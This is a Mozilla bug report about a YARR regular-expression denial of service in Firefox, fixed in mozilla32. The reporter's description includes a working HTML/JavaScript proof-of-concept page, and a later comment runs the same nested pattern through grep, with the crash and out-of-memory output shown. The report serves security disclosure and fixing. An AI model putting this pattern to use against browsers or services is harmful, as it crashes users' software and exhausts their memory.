Note: There are a few cases of duplicates in user autocompletion which are being worked on.

YARR regexp Memory exhaustion and crash

VERIFIED FIXED in mozilla32

Status

()

Core
JavaScript Engine
VERIFIED FIXED
3 years ago
3 years ago

People

(Reporter: Max, Unassigned)

Tracking

({crash, csectype-dos, sec-low})

27 Branch
mozilla32
crash, csectype-dos, sec-low
Points:
---

Firefox Tracking Flags

(firefox-esr31 wontfix)

Details

(crash signature)

(Reporter)

Description

3 years ago
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36

Steps to reproduce:

http://cert.cx/regexp-smaczki/regex.html

---
<HTML>
<HEAD>
<TITLE>Firefox 27.0.1 and Safari 7.0.2 (9537.74.9)</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF">
<SCRIPT type="text/javascript">
var patt1=new RegExp("((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))");
document.write(patt1.exec("cxsecurity"));
</SCRIPT>
</BODY>
</HTML>
---


Actual results:

memory exhaustion and crash

Observed memory exhaustion in Safari and Firefox under MacOSX.
Under windows Firefox has allocated 3,8GB 

http://cert.cx/regexp-smaczki/regcomp1.png

and crash

http://cert.cx/regexp-smaczki/regcomp3.png
(Reporter)

Updated

3 years ago
Hardware: x86 → x86_64
Summary: regexp → Firefox 27.0.1 regexp Memory exhaustion and crash
Component: Untriaged → JavaScript Engine
Product: Firefox → Core
(Reporter)

Comment 1

3 years ago
http://cert.cx/regexp-smaczki/regcomp1.png

Crash here

http://cert.cx/regexp-smaczki/visual4.png


Memory exhaustion
http://cert.cx/regexp-smaczki/visual3.png
http://cert.cx/regexp-smaczki/visual2.png
http://cert.cx/regexp-smaczki/visual1.png
What is the ID of the crash report you get?  It will be listed in about:crashes.
The sample made my browser hang and eventually, it used up all of the memory on my system, but no crash. Good DoS though.
(Reporter)

Comment 4

3 years ago
Crash only under windows and if more that 4gb free. 


Some another PoC for MacOSX 10.9.2

000000000000000:kozak6 cx$ ls |grep -E '((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))'
grep(715,0x7fff746ed310) malloc: *** mach_vm_map(size=18446744071973109760) failed (error code=3)
*** error: can't allocate region
*** set a breakpoint in malloc_error_break to debug
grep: out of memory
On x64 Nightly Windows it consumes enough memory to quickly DOS the operating system. On 32 bit Firefox Nightly I crashed at 

[@ mozilla::VectorBase<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy, js::Vector<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy> >::reserve(unsigned int) ] 
https://crash-stats.mozilla.com/report/index/8e2997ff-71ea-489f-a427-e387d2140316

[@ JSC::Yarr::YarrPatternConstructor::copyDisjunction(JSC::Yarr::PatternDisjunction*, bool) ]
https://crash-stats.mozilla.com/report/index/d3c0593b-13ab-4ee6-ba52-dac7d2140316
https://crash-stats.mozilla.com/report/index/9bd828e0-b6c5-45b6-8b89-648f42140316

[@ JSObject::getType(JSContext*) ]
https://crash-stats.mozilla.com/report/index/e33ef987-f160-4b46-8030-0ff062140316
https://crash-stats.mozilla.com/report/index/04b8743d-b489-4931-9eb4-00ec22140316
Status: UNCONFIRMED → NEW
Crash Signature: [@ mozilla::VectorBase<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy, js::Vector<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy> >::reserve(unsigned int) ]
Ever confirmed: true
OS: Mac OS X → All
Hardware: x86_64 → All
Group: core-security
Keywords: csectype-dos, sec-low
Summary: Firefox 27.0.1 regexp Memory exhaustion and crash → YARR regexp Memory exhaustion and crash
Crash Signature: [@ mozilla::VectorBase<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy, js::Vector<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy> >::reserve(unsigned int) ] → [@ mozilla::VectorBase<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy, js::Vector<JSC::Yarr::PatternTerm, int, js::SystemAllocPolicy> >::reserve(unsigned int) ] [@ JSC::Yarr::YarrPatternConstructor::copyDisjunction(JSC::Yarr::PatternDisjunctio&hellip;
Max: is this regexp memory exhaustion and crash still an issue in Firefox's Nightly channel? We replaced YARR with irregexp in Nightly 32 (bug 976446).
Depends on: 976446
Flags: needinfo?(max)
Keywords: crash
(Reporter)

Comment 8

3 years ago
I confirm that bad memory allocation and crash eliminated. irregexp is good choice
Flags: needinfo?(max)
Assuming fixed by bug 976446.
Status: NEW → RESOLVED
Last Resolved: 3 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla32
There is only one Yarr related crash in the last 3 days in the 32 or 33 channels, and it's for a 20140509030227 build.
Status: RESOLVED → VERIFIED
status-firefox-esr31: --- → wontfix
You need to log in before you can comment on or make changes to this bug.